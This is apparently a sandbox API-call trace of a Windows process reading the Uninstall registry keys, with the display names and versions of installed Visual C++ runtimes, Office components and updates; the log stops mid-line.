0x0 [0110.487] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x19eaa4*=0x3b) returned 0x0 [0110.487] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970f40 [0110.487] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.487] GetLastError () returned 0x12 [0110.487] SetLastError (dwErrCode=0x12) [0110.487] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="12.0.21005", lpcbData=0x19eaa4*=0xb) returned 0x0 [0110.488] GetLastError () returned 0x12 [0110.488] SetLastError (dwErrCode=0x12) [0110.488] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd8) returned 0x3970048 [0110.488] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0110.488] GetLastError () returned 0x12 [0110.488] SetLastError (dwErrCode=0x12) [0110.488] GetLastError () returned 0x12 [0110.488] SetLastError (dwErrCode=0x12) [0110.488] GetLastError () returned 0x12 [0110.488] SetLastError (dwErrCode=0x12) [0110.488] RegCloseKey (hKey=0x518) returned 0x0 [0110.488] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0xf, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.488] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757") returned 100 [0110.488] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.488] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.488] RegCloseKey (hKey=0x518) returned 0x0 [0110.488] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x10, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.489] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173") returned 100 [0110.489] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.489] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.489] RegCloseKey (hKey=0x518) returned 0x0 [0110.489] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x11, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.489] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860") returned 100 [0110.489] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.489] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.489] RegCloseKey (hKey=0x518) returned 0x0 [0110.489] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x12, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.489] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655") returned 100 [0110.489] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.489] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.489] RegCloseKey (hKey=0x518) returned 0x0 [0110.489] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x13, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.489] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743") returned 100 [0110.489] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.489] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.489] RegCloseKey (hKey=0x518) returned 0x0 [0110.490] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x14, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.490] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063") returned 100 [0110.490] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.490] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.490] RegCloseKey (hKey=0x518) returned 0x0 [0110.490] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x15, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.490] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573") returned 99 [0110.490] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.490] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x0, lpData=0x19f2d4*=0x31, lpcbData=0x19eaa4*=0x400) returned 0x2 [0110.490] RegCloseKey (hKey=0x518) returned 0x0 [0110.490] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x16, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.490] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}") returned 90 [0110.490] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.490] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x19eaa4*=0x3c) returned 0x0 [0110.491] GetLastError () returned 0x12 [0110.491] SetLastError (dwErrCode=0x12) [0110.491] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="14.25.28508", lpcbData=0x19eaa4*=0xc) returned 0x0 [0110.491] GetLastError () returned 0x12 [0110.491] SetLastError (dwErrCode=0x12) [0110.491] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x144) returned 0x29a6690 [0110.491] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.491] GetLastError () returned 0x12 [0110.491] SetLastError (dwErrCode=0x12) [0110.491] GetLastError () returned 0x12 [0110.491] SetLastError (dwErrCode=0x12) [0110.491] GetLastError () returned 0x12 [0110.491] SetLastError (dwErrCode=0x12) [0110.491] RegCloseKey (hKey=0x518) returned 0x0 [0110.491] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x17, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.491] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 90 [0110.491] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.492] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x19eaa4*=0x3d) returned 0x0 [0110.492] GetLastError () returned 0x12 [0110.492] SetLastError (dwErrCode=0x12) [0110.492] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="11.0.61030.0", lpcbData=0x19eaa4*=0xd) returned 0x0 [0110.492] GetLastError () returned 0x12 [0110.492] SetLastError (dwErrCode=0x12) [0110.492] GetLastError () returned 0x12 [0110.492] SetLastError (dwErrCode=0x12) [0110.492] GetLastError () returned 0x12 [0110.492] SetLastError (dwErrCode=0x12) [0110.492] GetLastError () returned 0x12 [0110.492] SetLastError (dwErrCode=0x12) [0110.493] RegCloseKey (hKey=0x518) returned 0x0 [0110.493] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x18, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.493] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 90 [0110.493] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.493] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x19eaa4*=0x3d) returned 0x0 [0110.493] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1e6) returned 0x29a69e8 [0110.493] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6690 | out: hHeap=0x29a0000) returned 1 [0110.493] GetLastError () returned 0x12 [0110.493] SetLastError (dwErrCode=0x12) [0110.493] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="12.0.30501.0", lpcbData=0x19eaa4*=0xd) returned 0x0 [0110.493] GetLastError () returned 0x12 [0110.494] SetLastError (dwErrCode=0x12) [0110.494] GetLastError () returned 0x12 [0110.494] SetLastError (dwErrCode=0x12) [0110.494] GetLastError () returned 0x12 [0110.494] SetLastError (dwErrCode=0x12) [0110.494] GetLastError () returned 0x12 [0110.494] SetLastError (dwErrCode=0x12) [0110.494] RegCloseKey (hKey=0x518) returned 0x0 [0110.494] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x19, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.494] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 90 [0110.494] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.494] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x19eaa4*=0x43) returned 0x0 [0110.494] GetLastError () returned 0x12 [0110.494] SetLastError (dwErrCode=0x12) [0110.494] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="14.25.28508.3", lpcbData=0x19eaa4*=0xe) returned 0x0 [0110.495] GetLastError () returned 0x12 [0110.495] SetLastError (dwErrCode=0x12) [0110.495] GetLastError () returned 0x12 [0110.495] SetLastError (dwErrCode=0x12) [0110.495] GetLastError () returned 0x12 [0110.495] SetLastError (dwErrCode=0x12) [0110.495] GetLastError () returned 0x12 [0110.495] SetLastError (dwErrCode=0x12) [0110.495] RegCloseKey (hKey=0x518) returned 0x0 [0110.495] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1a, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.495] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 90 [0110.495] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.495] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x19eaa4*=0x43) returned 0x0 [0110.496] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d9) returned 0x29a6bd8 [0110.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69e8 | out: hHeap=0x29a0000) returned 1 [0110.496] GetLastError () returned 0x12 [0110.496] SetLastError (dwErrCode=0x12) [0110.496] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="14.25.28508.3", lpcbData=0x19eaa4*=0xe) returned 0x0 [0110.496] GetLastError () returned 0x12 [0110.496] SetLastError (dwErrCode=0x12) [0110.496] GetLastError () returned 0x12 [0110.496] SetLastError (dwErrCode=0x12) [0110.496] GetLastError () returned 0x12 [0110.496] SetLastError (dwErrCode=0x12) [0110.496] GetLastError () returned 0x12 [0110.496] SetLastError (dwErrCode=0x12) [0110.496] RegCloseKey (hKey=0x518) returned 0x0 [0110.496] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1b, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.496] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}") returned 90 [0110.496] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.497] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x19eaa4*=0x2a) returned 0x0 [0110.497] GetLastError () returned 0x12 [0110.497] SetLastError (dwErrCode=0x12) [0110.497] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="8.0.61001", lpcbData=0x19eaa4*=0xa) returned 0x0 [0110.497] GetLastError () returned 0x12 [0110.497] SetLastError (dwErrCode=0x12) [0110.497] GetLastError () returned 0x12 [0110.497] SetLastError (dwErrCode=0x12) [0110.497] GetLastError () returned 0x12 [0110.497] SetLastError (dwErrCode=0x12) [0110.497] GetLastError () returned 0x12 [0110.497] SetLastError (dwErrCode=0x12) [0110.498] RegCloseKey (hKey=0x518) returned 0x0 [0110.498] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1c, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.498] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}") returned 90 [0110.498] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.498] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x19eaa4*=0x2f) returned 0x0 [0110.498] GetLastError () returned 0x12 [0110.498] SetLastError (dwErrCode=0x12) [0110.498] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="16.0.4266.1003", lpcbData=0x19eaa4*=0xf) returned 0x0 [0110.498] GetLastError () returned 0x12 [0110.498] SetLastError (dwErrCode=0x12) [0110.498] GetLastError () returned 0x12 [0110.498] SetLastError (dwErrCode=0x12) [0110.498] GetLastError () returned 0x12 [0110.498] SetLastError (dwErrCode=0x12) [0110.498] GetLastError () returned 0x12 [0110.499] SetLastError (dwErrCode=0x12) [0110.499] RegCloseKey (hKey=0x518) returned 0x0 [0110.499] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1d, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.499] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}") returned 90 [0110.499] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.499] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x19eaa4*=0x2e) returned 0x0 [0110.499] GetLastError () returned 0x12 [0110.499] SetLastError (dwErrCode=0x12) [0110.499] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="16.0.4266.1003", lpcbData=0x19eaa4*=0xf) returned 0x0 [0110.499] GetLastError () returned 0x12 [0110.499] SetLastError (dwErrCode=0x12) [0110.499] GetLastError () returned 0x12 [0110.499] SetLastError (dwErrCode=0x12) [0110.499] GetLastError () returned 0x12 [0110.500] SetLastError (dwErrCode=0x12) [0110.500] GetLastError () returned 0x12 [0110.500] SetLastError (dwErrCode=0x12) [0110.500] RegCloseKey (hKey=0x518) returned 0x0 [0110.500] RegEnumKeyExA (in: hKey=0x35c, dwIndex=0x1e, lpName=0x19ead4, lpcchName=0x19eaa4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x19eaa4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.500] wsprintfA (in: param_1=0x19eed4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}") returned 90 [0110.500] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea9c | out: phkResult=0x19ea9c*=0x518) returned 0x0 [0110.500] RegQueryValueExA (in: hKey=0x518, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19ea98, lpData=0x19f2d4, lpcbData=0x19eaa4*=0x400 | out: lpType=0x19ea98*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x19eaa4*=0x3f) returned 0x0 [0110.500] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x445) returned 0x29a6ec0 [0110.500] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6bd8 | out: hHeap=0x29a0000) returned 1 [0110.500] GetLastError () returned 